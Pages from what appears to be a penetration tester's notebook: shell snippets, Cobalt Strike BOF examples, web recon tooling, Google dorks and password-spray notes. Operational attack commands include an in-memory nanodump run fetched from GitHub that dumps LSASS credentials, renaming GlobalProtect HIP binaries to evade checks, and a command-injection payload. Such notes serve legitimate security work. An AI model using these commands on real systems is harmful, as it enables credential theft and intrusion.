Copy\ \ $ find . -type f -print -exec sh -c 'strings $1 | grep -i -n "signature"' sh {} \;\ \ Copy\ \ $ find . -type f -print0 | xargs -0 grep \ \ Copy\ \ $ export LESS="-R -i"\ $ find . -type f -name "*.txt" -print0 | xargs -0 -I{} sh -c 'cat "{}"; echo' | less\ \ Copy\ \ $ find . -type f -name "*.txt" | parallel tre-agrep -H --color mystring {} -iE2\ \ Copy\ \ $ readlink -f somefile.txt\ \ Copy\ \ $ paste -d':' a.txt b.txt > c.txt\ \ Copy\ \ $ tmux run 'echo #{pane_id}'\ $ cat files.txt | while read; do tmux send -t '%1' "$REPLY"; sleep 5; done\ \ Copy\ \ $ dpkg -s \ $ dpkg-query -W -f='${Status}' \ $ OUT="dpkg-query-$(date +'%FT%H%M%S').csv"; echo 'package,version' > ${OUT} && dpkg-query -W -f '${Package},${Version}\n' >> ${OUT}\ \ Copy\ \ # Mount volume\ $ veracrypt -t --pim=0 --keyfiles='' --protect-hidden=no /home/snovvcrash/SecretVolume.dat /mnt\ # Unmount all\ $ veracrypt -d\ \ Copy\ \ $ sudo openconnect --protocol=gp gp.megacorp.com -u snovvcrash\ \ Copy\ \ PS > Rename-Item "C:\Program Files\Palo Alto Networks\GlobalProtect\PanGpHip.exe" "PanGpHip.exe.bak"\ PS > Rename-Item "C:\Program Files\Palo Alto Networks\GlobalProtect\PanGpHipMp.exe" "PanGpHipMp.exe.bak"\ PS > Rename-Item "C:\Program Files\Palo Alto Networks\GlobalProtect\wa_3rd_party_host_64.exe" "wa_3rd_party_host_64.exe.bak"\ \ Copy\ \ # PHP\ $ sudo add-apt-repository ppa:ondrej/php -y\ $ sudo apt update\ $ sudo apt install php7.2 -y\ $ sudo apt install php7.2-curl php7.2-gd php7.2-json php7.2-mbstring -y\ \ # Apache\ $ sudo apt install apache2 libapache2-mod-php7.2 -y\ $ sudo service apache2 restart\ \ # MySQL\ $ sudo apt install mysql-server php7.2-mysql\ $ sudo mysql_secure_installation\ $ service mysql restart\ \ # Test\ $ sudo sh -c 'echo "" > phpinfo.php'\ -> http://127.0.0.1/phpinfo.php\ \ Copy\ \ $ sudo apt-get install cmatrix\ \ Copy\ \ $ wget -O screenfetch https://raw.github.com/KittyKatt/screenFetch/master/screenfetch-dev\ $ chmod +x screenfetch\ $ sudo mv screenfetch /usr/bin --- # DLL Injectors | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/red-team/dev/code-injection/dll-injectors.md) . [](https://ppn.snovvcra.sh/red-team/dev/code-injection/dll-injectors#reflective-dll-injection-rdi) Reflective DLL Injection (RDI) -------------------------------------------------------------------------------------------------------------------------------------- * [https://github.com/stephenfewer/ReflectiveDLLInjection](https://github.com/stephenfewer/ReflectiveDLLInjection) * [https://github.com/dismantl/ImprovedReflectiveDLLInjection](https://github.com/dismantl/ImprovedReflectiveDLLInjection) * [https://github.com/Moriarty2016/NimRDI](https://github.com/Moriarty2016/NimRDI) * [https://bruteratel.com/research/feature-update/2021/06/01/PE-Reflection-Long-Live-The-King/](https://bruteratel.com/research/feature-update/2021/06/01/PE-Reflection-Long-Live-The-King/) * [https://github.com/Krypteria/AtlasLdr](https://github.com/Krypteria/AtlasLdr) * [https://oldboy21.github.io/posts/2023/12/all-i-want-for-christmas-is-reflective-dll-injection/](https://oldboy21.github.io/posts/2023/12/all-i-want-for-christmas-is-reflective-dll-injection/) * [https://oldboy21.github.io/posts/2024/02/reflective-dll-got-indirect-syscall-skills/](https://oldboy21.github.io/posts/2024/02/reflective-dll-got-indirect-syscall-skills/) * [https://blog.malicious.group/writing-your-own-rdi-srdi-loader-using-c-and-asm/](https://blog.malicious.group/writing-your-own-rdi-srdi-loader-using-c-and-asm/) * [https://github.com/BlackHat-Ashura/Reflective\_DLL\_Injection](https://github.com/BlackHat-Ashura/Reflective_DLL_Injection) ### [](https://ppn.snovvcra.sh/red-team/dev/code-injection/dll-injectors#custom-loadlibrary) Custom LoadLibrary * [https://www.riskinsight-wavestone.com/en/2024/10/loadlibrary-madness-dynamically-load-winhttp-dll/](https://www.riskinsight-wavestone.com/en/2024/10/loadlibrary-madness-dynamically-load-winhttp-dll/) * [https://github.com/OtterHacker/Conferences/tree/main/Defcon32](https://github.com/OtterHacker/Conferences/tree/main/Defcon32) * [https://injectexp.dev/b/LoadLibraryReloaded](https://injectexp.dev/b/LoadLibraryReloaded) * [https://github.com/EvanMcBroom/perfect-loader](https://github.com/EvanMcBroom/perfect-loader) * [https://github.com/paskalian/WID\_LoadLibrary](https://github.com/paskalian/WID_LoadLibrary) Last updated 8 months ago * [Reflective DLL Injection (RDI)](https://ppn.snovvcra.sh/red-team/dev/code-injection/dll-injectors#reflective-dll-injection-rdi) * [Custom LoadLibrary](https://ppn.snovvcra.sh/red-team/dev/code-injection/dll-injectors#custom-loadlibrary) --- # Subdomain Takeover | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/subdomain-takeover.md) . * [https://www.exploit-db.com/docs/46415](https://www.exploit-db.com/docs/46415) Last updated 4 years ago --- # BOF / COFF | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/red-team/dev/bof-coff.md) . * [https://www.trustedsec.com/blog/operators-guide-to-the-meterpreter-bofloader/](https://www.trustedsec.com/blog/operators-guide-to-the-meterpreter-bofloader/) * [https://securityintelligence.com/posts/how-to-hide-beacon-during-bof-execution/](https://securityintelligence.com/posts/how-to-hide-beacon-during-bof-execution/) * [https://github.com/xforcered/bofmask](https://github.com/xforcered/bofmask) * [\[PDF\] Microsoft Portable Executable and Common Object File Format Specification (Microsoft Corporation)](https://courses.cs.washington.edu/courses/cse378/03wi/lectures/LinkerFiles/coff.pdf) Argument types for [bof\_pack](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_functions.htm#bof_pack) : **Type** **Description** **Unpack With (C)** b binary data BeaconDataExtract i 4-byte integer BeaconDataInt s 2-byte short integer BeaconDataShort z zero-terminated+encoded string BeaconDataExtract Z zero-terminated wide-char string (wchar\_t \*)BeaconDataExtract A basic BOF example: BOF Aggressor msgbox.c Copy // curl -sS https://download.cobaltstrike.com/downloads/beacon.h -o beacon.h // x86_64-w64-mingw32-gcc -c msgbox.c -o msgbox.o #include #include "beacon.h" void go(char* args, int alen) { DECLSPEC_IMPORT INT WINAPI USER32$MessageBoxA(HWND, LPCSTR, LPCSTR, UINT); datap parser; BeaconDataParse(&parser, args, alen); char* message; message = BeaconDataExtract(&parser, NULL); USER32$MessageBoxA(NULL, message, "Hello from BOF!", 0); } msgbox.cna Copy alias msgbox { local('$handle $bof $args'); # Read the bof file $handle = openf(script_resource("msgbox.o")); $bof = readb($handle, -1); closef($handle); # Pack args $args = bof_pack($1, "z", $2); # Print task to console btask($1, "Running MessageBoxA BOF"); # Execute BOF beacon_inline_execute($1, $bof, "go", $args); } beacon_command_register("msgbox", "Pops a message box", "Calls the MessageBoxA Win32 API"); [](https://ppn.snovvcra.sh/red-team/dev/bof-coff#run-bofs-outside-of-c2) Run BOFs outside of C2 ---------------------------------------------------------------------------------------------------- * [https://www.trustedsec.com/blog/coffloader-building-your-own-in-memory-loader-or-how-to-run-bofs/](https://www.trustedsec.com/blog/coffloader-building-your-own-in-memory-loader-or-how-to-run-bofs/) * [https://github.com/trustedsec/COFFLoader](https://github.com/trustedsec/COFFLoader) * [https://skyblue.team/posts/invoke-bof/](https://skyblue.team/posts/invoke-bof/) * [https://github.com/airbus-cert/Invoke-Bof](https://github.com/airbus-cert/Invoke-Bof) * [https://github.com/Cracked5pider/CoffeeLdr](https://github.com/Cracked5pider/CoffeeLdr) * [https://github.com/frkngksl/NiCOFF](https://github.com/frkngksl/NiCOFF) * [https://github.com/trustedsec/CS\_COFFLoader](https://github.com/trustedsec/CS_COFFLoader) ### [](https://ppn.snovvcra.sh/red-team/dev/bof-coff#runof) RunOF * [https://labs.nettitude.com/blog/introducing-runof-arbitrary-bof-tool/](https://labs.nettitude.com/blog/introducing-runof-arbitrary-bof-tool/) * [https://github.com/nettitude/RunOF](https://github.com/nettitude/RunOF) An example of running the [nanodump.x64.o](https://github.com/helpsystems/nanodump/blob/main/dist/nanodump.x64.o) BOF via RunOF [fork](https://github.com/snovvcrash/RunOF) from memory: * Compile RunOF.exe assembly and convert it to a PowerShell invoker (see [.NET Reflective Assembly](https://github.com/snovvcrash/PPN/blob/master/pentest/infrastructure/ad/av-edr-evasion/dotnet-reflective-assembly.md) ) * Search for argument types that the target BOF uses (usually located in accompanying Aggressor scripts): * Load the invoker into memory, fetch the BOF (`-u` option) and run it providing necessary arguments with their types like this: Last updated 1 year ago * [Run BOFs outside of C2](https://ppn.snovvcra.sh/red-team/dev/bof-coff#run-bofs-outside-of-c2) * [RunOF](https://ppn.snovvcra.sh/red-team/dev/bof-coff#runof) Copy curl -sSL 'https://github.com/helpsystems/nanodump/raw/main/'`curl -sSL 'https://api.github.com/repos/helpsystems/nanodump/git/trees/main?recursive=1' | jq -r '.tree[] | select(.path | endswith(".cna")) | .path'` | grep bof_pack $args = bof_pack($1, "iziiiiiiiziiz", $pid, $dump_path, $write_file, $use_valid_sig, $fork, $snapshot, $dup, $get_pid, $use_malseclogon, $binary_path, $use_malseclogon_race, $use_werfault, $werfault_lsass); $args = bof_pack($1, "ziiiiizb", $dump_path, $use_valid_sig, $fork, $snapshot, $dup, $use_malseclogon, $binary_path, $dll); $args = bof_pack($1, "z", $ssp_path); $args = bof_pack($1, "z", $2); Copy PS > Invoke-RunOF -u https://github.com/helpsystems/nanodump/raw/main/dist/nanodump.x64.o '-i:0' '-z:C:\Windows\Temp\lsass.bin' '-i:1' '-i:1' '-i:0' '-i:0' '-i:0' '-i:0' '-i:0' '-z:' '-i:0' '-z:' --- # Web | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/web.md) . * [\[PDF\] Frogy's Mindmap](https://github.com/iamthefrogy/Web-Application-Pentest-Checklist/raw/main/Frogy%27s%20Mindmap.pdf) ![](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2Fmiro.medium.com%2Fmax%2F2400%2F1*8lN7TaTnlZSPEikpHFQnuA.png&width=768&dpr=3&quality=100&sign=ee341f66&sv=2) Pentesting Web Applications Mindmap [](https://ppn.snovvcra.sh/pentest/web#version-enumeration) Version Enumeration ------------------------------------------------------------------------------------ ### [](https://ppn.snovvcra.sh/pentest/web#commits) Commits * [https://0xdf.gitlab.io/2023/07/29/htb-cerberus.html](https://0xdf.gitlab.io/2023/07/29/htb-cerberus.html#icingacerberuslocal---tcp-8080) [](https://ppn.snovvcra.sh/pentest/web#out-of-band-oob-exploitation-exfiltration) Out-of-Band (OOB) Exploitation/Exfiltration ---------------------------------------------------------------------------------------------------------------------------------- * [https://notsosecure.com/out-band-exploitation-oob-cheatsheet](https://notsosecure.com/out-band-exploitation-oob-cheatsheet) [](https://ppn.snovvcra.sh/pentest/web#output-redirection) Output Redirection ---------------------------------------------------------------------------------- * [https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html](https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html) [](https://ppn.snovvcra.sh/pentest/web#tools) Tools -------------------------------------------------------- * [https://infosecwriteups.com/cool-recon-techniques-every-hacker-misses-1c5e0e294e89](https://infosecwriteups.com/cool-recon-techniques-every-hacker-misses-1c5e0e294e89) ### [](https://ppn.snovvcra.sh/pentest/web#nikto) nikto * [https://github.com/sullo/nikto](https://github.com/sullo/nikto) ### [](https://ppn.snovvcra.sh/pentest/web#dnsrecon) dnsrecon * [https://github.com/darkoperator/dnsrecon](https://github.com/darkoperator/dnsrecon) Perform reverse DNS lookup for IPs in subnet `10.10.10.0/24` with a name server at `192.168.1.11`: ### [](https://ppn.snovvcra.sh/pentest/web#gobuster) gobuster * [https://github.com/OJ/gobuster/releases](https://github.com/OJ/gobuster/releases) * [https://blog.assetnote.io/2021/04/05/contextual-content-discovery/](https://blog.assetnote.io/2021/04/05/contextual-content-discovery/) ### [](https://ppn.snovvcra.sh/pentest/web#wfuzz) wfuzz * [https://github.com/xmendez/wfuzz](https://github.com/xmendez/wfuzz) * [https://wfuzz.readthedocs.io/en/latest/](https://wfuzz.readthedocs.io/en/latest/) ### [](https://ppn.snovvcra.sh/pentest/web#ffuf) ffuf * [https://github.com/ffuf/ffuf](https://github.com/ffuf/ffuf) * [https://codingo.io/tools/ffuf/bounty/2020/09/17/everything-you-need-to-know-about-ffuf.html](https://codingo.io/tools/ffuf/bounty/2020/09/17/everything-you-need-to-know-about-ffuf.html) ### [](https://ppn.snovvcra.sh/pentest/web#aquatone) aquatone * [https://github.com/michenriksen/aquatone/releases](https://github.com/michenriksen/aquatone/releases) * [https://github.com/BishopFox/eyeballer](https://github.com/BishopFox/eyeballer) Default ports: From Nmap XML: ### [](https://ppn.snovvcra.sh/pentest/web#amass) amass * [https://github.com/OWASP/Amass/releases](https://github.com/OWASP/Amass/releases) [![Logo](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2Fsnovvcra.sh%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=39de3028&sv=2)Об обнаружении субдоменовsnovvcrash@gh-pages:~$ \_](https://snovvcrash.github.io/2020/05/10/subdomain-discovery.html) ### [](https://ppn.snovvcra.sh/pentest/web#subfinder) subfinder * [https://github.com/projectdiscovery/subfinder/releases](https://github.com/projectdiscovery/subfinder/releases) ### [](https://ppn.snovvcra.sh/pentest/web#shuffledns) shuffledns * [https://github.com/projectdiscovery/shuffledns/releases](https://github.com/projectdiscovery/shuffledns/releases) ### [](https://ppn.snovvcra.sh/pentest/web#massdns) massdns * [https://github.com/blechschmidt/massdns](https://github.com/blechschmidt/massdns) * [https://github.com/vortexau/dnsvalidator](https://github.com/vortexau/dnsvalidator) ### [](https://ppn.snovvcra.sh/pentest/web#pdtm) pdtm * [https://github.com/projectdiscovery/pdtm](https://github.com/projectdiscovery/pdtm) ### [](https://ppn.snovvcra.sh/pentest/web#dnsx) dnsx * [https://github.com/projectdiscovery/dnsx](https://github.com/projectdiscovery/dnsx) ### [](https://ppn.snovvcra.sh/pentest/web#chaos) chaos * [https://github.com/projectdiscovery/chaos-client](https://github.com/projectdiscovery/chaos-client) ### [](https://ppn.snovvcra.sh/pentest/web#httpx) httpx * [https://github.com/projectdiscovery/httpx/releases](https://github.com/projectdiscovery/httpx/releases) With an upsteam proxy using [proxify](https://github.com/projectdiscovery/proxify) : ### [](https://ppn.snovvcra.sh/pentest/web#katana) katana * [https://github.com/projectdiscovery/katana](https://github.com/projectdiscovery/katana/releases) * [https://github.com/CristiVlad25/scripts/blob/master/kata.sh](https://github.com/CristiVlad25/scripts/blob/master/kata.sh) ### [](https://ppn.snovvcra.sh/pentest/web#interactsh) interactsh * [https://github.com/projectdiscovery/interactsh](https://github.com/projectdiscovery/interactsh) Self-hosted: ### [](https://ppn.snovvcra.sh/pentest/web#nuclei) nuclei * [https://blog.projectdiscovery.io/ultimate-nuclei-guide/](https://blog.projectdiscovery.io/ultimate-nuclei-guide/) [https://twitter.com/reconone\_/status/1540666730829082624twitter.com](https://twitter.com/reconone_/status/1540666730829082624) * [https://github.com/projectdiscovery/nuclei/releases](https://github.com/projectdiscovery/nuclei/releases) * [https://github.com/DingyShark/nuclei-scan-sort](https://github.com/DingyShark/nuclei-scan-sort) * [https://github.com/0xKayala/NucleiFuzzer](https://github.com/0xKayala/NucleiFuzzer) * [https://templates.nuclei.sh/](https://templates.nuclei.sh/) Sort results: SSL / TLS: Using [tlsx](https://github.com/projectdiscovery/tlsx/releases) : Web scan against a large scope: Network scan against a large scope: Last updated 1 year ago * [Version Enumeration](https://ppn.snovvcra.sh/pentest/web#version-enumeration) * [Commits](https://ppn.snovvcra.sh/pentest/web#commits) * [Out-of-Band (OOB) Exploitation/Exfiltration](https://ppn.snovvcra.sh/pentest/web#out-of-band-oob-exploitation-exfiltration) * [Output Redirection](https://ppn.snovvcra.sh/pentest/web#output-redirection) * [Tools](https://ppn.snovvcra.sh/pentest/web#tools) * [nikto](https://ppn.snovvcra.sh/pentest/web#nikto) * [dnsrecon](https://ppn.snovvcra.sh/pentest/web#dnsrecon) * [gobuster](https://ppn.snovvcra.sh/pentest/web#gobuster) * [wfuzz](https://ppn.snovvcra.sh/pentest/web#wfuzz) * [ffuf](https://ppn.snovvcra.sh/pentest/web#ffuf) * [aquatone](https://ppn.snovvcra.sh/pentest/web#aquatone) * [amass](https://ppn.snovvcra.sh/pentest/web#amass) * [subfinder](https://ppn.snovvcra.sh/pentest/web#subfinder) * [shuffledns](https://ppn.snovvcra.sh/pentest/web#shuffledns) * [massdns](https://ppn.snovvcra.sh/pentest/web#massdns) * [pdtm](https://ppn.snovvcra.sh/pentest/web#pdtm) * [dnsx](https://ppn.snovvcra.sh/pentest/web#dnsx) * [chaos](https://ppn.snovvcra.sh/pentest/web#chaos) * [httpx](https://ppn.snovvcra.sh/pentest/web#httpx) * [katana](https://ppn.snovvcra.sh/pentest/web#katana) * [interactsh](https://ppn.snovvcra.sh/pentest/web#interactsh) * [nuclei](https://ppn.snovvcra.sh/pentest/web#nuclei) Copy for f in `find public/ -type f`; do echo "$f: `git log --oneline "$f" | wc -l`"; done | sort -nrk2 > /tmp/files_stat && head /tmp/files_stat TARGET_FILE=`head -1 /tmp/files_stat | awk -F: '{print $1}'` TARGET_FILE_BASENAME=`basename $TARGET_FILE` for hash in `git log --oneline $TARGET_FILE | awk '{print $1}'`; do (git checkout "$hash"; echo "$hash: `md5sum $TARGET_FILE`") 2>/dev/null | tee -a "/tmp/$TARGET_FILE_BASENAME.md5"; done git reset --hard && git checkout main grep `curl -sSLk "https://example.com/$TARGET_FILE" | md5sum | awk '{print $1}'` "/tmp/$TARGET_FILE_BASENAME.md5" git log $TARGET_FILE Copy sh -c $@|sh . echo echo test > /tmp/.1 && ls -la /tmp/.1 && cat /tmp/.1 && rm /tmp/.1 Copy $ nikto -h http://127.0.0.1 -Cgidirs all Copy $ dnsrecon -r 10.10.10.0/24 -n 192.168.1.11 -d DoesNotMatter Copy $ gobuster dir -ku 'https://127.0.0.1' -w /usr/share/wordlists/dirbuster/directory-list[-lowercase]-2.3-medium.txt -x php,asp,aspx,jsp,ini,config,cfg,xml,htm,html,json,bak,txt -t 50 -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0' -s 200,204,301,302,307,401 -o gobuster/127.0.0.1 $ gobuster dir -ku 'https://127.0.0.1' -w /usr/share/seclists/Discovery/Web-Content/raft-small-words[-lowercase].txt -x php,asp,aspx,jsp,ini,config,cfg,xml,htm,html,json,bak,txt -t 50 -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0' -s 200,204,301,302,307,401 -o gobuster/127.0.0.1 Copy $ wfuzz -e encoders $ wfuzz -c -u 'http://10.10.13.37/index.php?id=FUZZ' -w /usr/share/seclists/Fuzzing/4-digits-0000-9999.txt -f wfuzz.out --hh 1337 $ wfuzz -c -u 'http://10.10.13.37' --basic 'FUZZ:FUZ2Z' -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -w /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt --hc 1337 Copy $ cat targets.txt | ./aquatone -ports 80,443,8000,8080,8443 -out 10.0-255.0-255.0-255 $ cat targets.txt | ./aquatone -ports xlarge -out 10.0-255.0-255.0-255 Copy $ ports=`cat nmap/tcp.gnmap | grep -ioP '\d+/open/tcp//http' | awk -F/ '{print $1}' | sort -u | awk 1 ORS=',' | sed 's/.$//'` $ cat targets.txt | ./aquatone -ports $ports -out 10.0-255.0-255.0-255_nmap Or $ cat nmap/tcp.xml | ./aquatone -nmap -out 10.0-255.0-255.0-255_nmap Copy $ amass intel -active -config config.ini -whois -df domains.txt -ipv4 -src -v -o intel.out $ amass enum -active -brute -config config.ini -df domains.txt -ipv4 -src -v -o enum.out Copy $ subfinder -all -config config.yaml -d hackerone.com -o subdomains.txt [-oI -nW] Copy $ shuffledns -d hackerone.com -r /opt/dnsvalidator/resolvers.txt -w /usr/share/commonspeak2-wordlists/subdomains/subdomains.txt -o subdomains.txt -t 500 Copy $ massdns -r /opt/dnsvalidator/resolvers.txt domains.txt -w domains-resolved.txt -o S Copy # curl "https://zyedidia.github.io/eget.sh" | sh && sudo mv eget /usr/local/bin mkdir pd && cd pd eget -qs linux/amd64 "projectdiscovery/pdtm" --to pdtm ./pdtm -ia -ip -bp `pwd` ./nuclei curl -sSL "https://github.com/DingyShark/nuclei-scan-sort/raw/main/nuclei_sort.py" -o nuclei_sort.py sed -i '1 i #!/usr/bin/env python3' nuclei_sort.py chmod +x nuclei_sort.py Copy $ dnsx -l dns.txt -resp -a -aaaa -cname -mx -ns -soa -txt $ dnsx -d megacorp.local -r 192.168.0.11,192.168.0.22 -w /usr/share/seclists/Discovery/DNS/... -a -t 25 -o ~/ws/log/dnsx.log -silent Copy $ chaos -d megacorp.com -key -http-status-code -http-title -http-url -o chaos.out Copy $ httpx -l domains.txt -vhost -http2 -pipeline -title -content-length -status-code -follow-redirects -tls-probe -content-type -location -csp-probe -web-server -stats -ip -cname -cdn -ports 80,81,300,443,591,593,832,981,1010,1311,2082,2087,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5800,6543,7000,7396,7474,8000,8001,8008,8014,8042,8069,8080,8081,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8443,8500,8834,8880,8888,8983,9000,9043,9060,9080,9090,9091,9200,9443,9800,9981,12443,16080,18091,18092,20720,28017 -threads 300 -o httpx.out Copy $ proxify -silent -socks5-proxy 127.0.0.1:10080 $ httpx -silent -probe -u 192.168.1.11 -p https:443 -http-proxy http://127.0.0.1:8888 Copy $ katana -u https://megacorp.com/ -hl -nos -jc -silent -aff -kf all,robotstxt,sitemapxml -c 150 -fs fqdn | subjs | jsa.py | goverview probe -N -c 500 | sort -u -t';' -k2,14 | cut -d';' -f1 Copy $ interactsh-client -server example.com -token '1337t0k3n' -o interactsh.log -sf interactsh.session -asn -v Copy $ nuclei -update-templates $ nuclei -l domains.txt [-t cves] -o nuclei.out Copy # Manually cat nuclei.out | grep -v info | grep '\] \[' | sort -k3\ # Automated\ curl -sSL "https://github.com/DingyShark/nuclei-scan-sort/raw/main/nuclei_sort.py" -o nuclei_sort.py\ sed -i '1 i #!/usr/bin/env python3' nuclei_sort.py\ chmod +x nuclei_sort.py\ python3 nuclei_sort.py -i nuclei.out | grep -v info | grep . --color=none\ \ Copy\ \ $ nuclei -l domains.txt -t ssl -o nuclei_ssl.out | tee nuclei_ssl.tee\ $ cat nuclei_ssl.out | grep -e deprecated-tls -e detect-ssl -e expired-ssl -e mismatched-ssl -e self-signed -e weak-cipher | sort -u\ \ Copy\ \ $ das -db corp parse https -raw | tlsx -ex -ss -mm -re -o tlsx.out\ \ Copy\ \ $ nuclei -l targets.txt -ni -eid 'addeventlistener-detect,cname-fingerprint,deprecated-tls,dns-waf-detect,expired-ssl,http-missing-security-headers,mismatched-ssl,mismatched-ssl-certificate,mx-fingerprint,mx-service-detector,nameserver-fingerprint,options-method,revoked-ssl-certificate,robots-txt-endpoint,self-signed-ssl,ssl-dns-names,ssl-issuer,tech-detect,tls-version,txt-fingerprint,untrusted-root-certificate,waf-detect,weak-cipher-suites,xss-deprecated-header-detect' -etags network,xss -o nuclei_web.out | tee nuclei_web.tee\ \ Copy\ \ nuclei -l targets.txt -eid 'addeventlistener-detect,cname-fingerprint,deprecated-tls,dns-waf-detect,expired-ssl,http-missing-security-headers,mismatched-ssl,mismatched-ssl-certificate,mx-fingerprint,mx-service-detector,nameserver-fingerprint,options-method,revoked-ssl-certificate,robots-txt-endpoint,self-signed-ssl,ssl-dns-names,ssl-issuer,tech-detect,tls-version,txt-fingerprint,untrusted-root-certificate,waf-detect,weak-cipher-suites,xss-deprecated-header-detect' -etags xss -o nuclei_network.out -iserver example.com -itoken '1337t0K3n' | tee nuclei_network.tee --- # Information Gathering | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/information-gathering.md) . [](https://ppn.snovvcra.sh/pentest/perimeter/information-gathering#google-dorks) Google Dorks -------------------------------------------------------------------------------------------------- Copy site:megacorp.com filetype:(doc | docx | docm | xls | xlsx | xlsm | ppt | pptx | pptm | pdf | rtf | odt | xml | txt) site:megacorp.com ext:(config | cfg | ini | log | bak | backup | dat) site:megacorp.com ext:(php | asp | aspx) "@megacorp.com" email e-mail "megacorp.com" site:ideone.com | site:codebeautify.org | site:codeshare.io | site:codepen.io | site:repl.it | site:justpaste.it | site:pastebin.com | site:jsfiddle.net | site:trello.com Last updated 4 years ago --- # Lync & Skype for Business | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/lync-s4b.md) . [](https://ppn.snovvcra.sh/pentest/perimeter/lync-s4b#lyncsmash) lyncsmash ------------------------------------------------------------------------------- * [https://github.com/nyxgeek/lyncsmash](https://github.com/nyxgeek/lyncsmash) Copy $ python lyncsmash.py enum -H dialin.megacorp.com -U names.txt -p 'Passw0rd!' -d MEGACORP -o lyncsmash.out Last updated 4 years ago --- # SharePoint | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/sharepoint.md) . * [https://www.crummie5.club/the-lone-sharepoint/](https://www.crummie5.club/the-lone-sharepoint/) * [https://www.zerodayinitiative.com/blog/2020/6/16/cve-2020-1181-sharepoint-remote-code-execution-through-web-parts](https://www.zerodayinitiative.com/blog/2020/6/16/cve-2020-1181-sharepoint-remote-code-execution-through-web-parts) Last updated 4 years ago --- # Development | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/red-team/dev.md) . * [https://threadreaderapp.com/thread/1520676600681209858.html](https://threadreaderapp.com/thread/1520676600681209858.html) * [https://www.mdsec.co.uk/2022/07/part-1-how-i-met-your-beacon-overview/](https://www.mdsec.co.uk/2022/07/part-1-how-i-met-your-beacon-overview/) * [https://www.mdsec.co.uk/2022/07/part-2-how-i-met-your-beacon-cobalt-strike/](https://www.mdsec.co.uk/2022/07/part-2-how-i-met-your-beacon-cobalt-strike/) * [https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/](https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/) [EIKAR](https://ru.wikipedia.org/wiki/EICAR-Test-File) test file: [](https://ppn.snovvcra.sh/red-team/dev#blog-series-books) Blog Series / Books ----------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/red-team/dev#pe-structure--peb-ldr) PE Structure (+ PEB/LDR) * [https://alice.climent-pommeret.red/posts/direct-syscalls-hells-halos-syswhispers2/](https://alice.climent-pommeret.red/posts/direct-syscalls-hells-halos-syswhispers2/#the-common-ground) * [https://viuleeenz.github.io/posts/2024/02/understanding-peb-and-ldr-structures-using-ida-and-lummastealer/](https://viuleeenz.github.io/posts/2024/02/understanding-peb-and-ldr-structures-using-ida-and-lummastealer/) * [https://fareedfauzi.github.io/2024/07/13/PEB-Walk.html](https://fareedfauzi.github.io/2024/07/13/PEB-Walk.html) * [https://print3m.github.io/blog/x64-winapi-shellcoding](https://print3m.github.io/blog/x64-winapi-shellcoding) * [https://habr.com/ru/articles/808787/](https://habr.com/ru/articles/808787/) * [https://nikhilh-20.github.io/blog/peb\_phobos\_ransomware/](https://nikhilh-20.github.io/blog/peb_phobos_ransomware/) * [https://redops.at/en/blog/edr-analysis-leveraging-fake-dlls-guard-pages-and-veh-for-enhanced-detection](https://redops.at/en/blog/edr-analysis-leveraging-fake-dlls-guard-pages-and-veh-for-enhanced-detection) * [https://onlyf8.com/pe-format](https://onlyf8.com/pe-format) * [https://synawk.com/blog/peb-obfuscation-malware-dev-0x4](https://synawk.com/blog/peb-obfuscation-malware-dev-0x4) ![](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2Fprint3m.github.io%2Fimgs%2Fx64-shellcoding-winapi%2Fpe-structure.png&width=768&dpr=3&quality=100&sign=50dc76ca&sv=2) PE File Structure (by @Print3M) #### [](https://ppn.snovvcra.sh/red-team/dev#a-dive-into-the-pe-file-format-0xrick) A dive into the PE file format (0xRick) * [A dive into the PE file format - Introduction](https://0xrick.github.io/win-internals/pe1/) * [A dive into the PE file format - PE file structure - Part 1: Overview](https://0xrick.github.io/win-internals/pe2/) * [A dive into the PE file format - PE file structure - Part 2: DOS Header, DOS Stub and Rich Header](https://0xrick.github.io/win-internals/pe3/) * [A dive into the PE file format - PE file structure - Part 3: NT Headers](https://0xrick.github.io/win-internals/pe4/) * [A dive into the PE file format - PE file structure - Part 4: Data Directories, Section Headers and Sections](https://0xrick.github.io/win-internals/pe5/) * [A dive into the PE file format - PE file structure - Part 5: PE Imports (Import Directory Table, ILT, 